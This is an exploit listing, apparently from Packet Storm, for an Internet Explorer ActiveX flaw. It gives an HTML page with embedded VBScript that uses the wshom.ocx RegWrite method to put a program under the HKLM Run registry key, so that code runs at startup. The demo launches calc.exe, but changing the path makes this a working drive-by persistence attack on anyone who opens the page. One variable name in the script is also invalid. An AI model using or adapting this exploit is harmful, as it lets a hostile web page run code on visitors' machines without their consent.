Internet Explorer suffers from a wshom.ocx Active-X insecure method remote code execution vulnerability.
a6952c754fdd899da306161524244dba96352d426a0c95f354394937c39c051b==============================================================================
_ _ _ _ _ _
/ \ | | | | / \ | | | |
/ _ \ | | | | / _ \ | |_| |
/ ___ \ | |___ | |___ / ___ \ | _ |
IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_|
==============================================================================
#Exploit title:0-day Interner Explorer ActiveX remote code Execution 2 (insecure method)
#version: all versions
#Author: [D3V!L FUCKER & germaya_x]
#special thanx: [for my best friend his0k4].
#Geetz [2] :[Sarbot511 ,thrid-devil ,ahwak2000].
#tested on : windows 7 , windows vista ,windows xp sp2
#n0te:you can use it by run it then restart the computer once it open you will show the calc.exe
==============================================================================
<html>
<object classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B' id='target' ></object>
<script language='vbscript'>
targetFile = "c:\WINDOWS\system32\wshom.ocx"
prototype = "Sub RegWrite ( ByVal Name As String , ByRef Value As Variant , [ ByRef Type As Variant ] )"
memberName = "RegWrite"
progid = "IWshRuntimeLibrary.IWshShell_Class"
argCount = 3
D3V!L FUCKER="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"
germaya_x="C:\WINDOWS\system32\calc.exe"
his0k4="REG_SZ"
target.RegWrite D3V!L FUCKER ,germaya_x ,his0k4
</script>
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed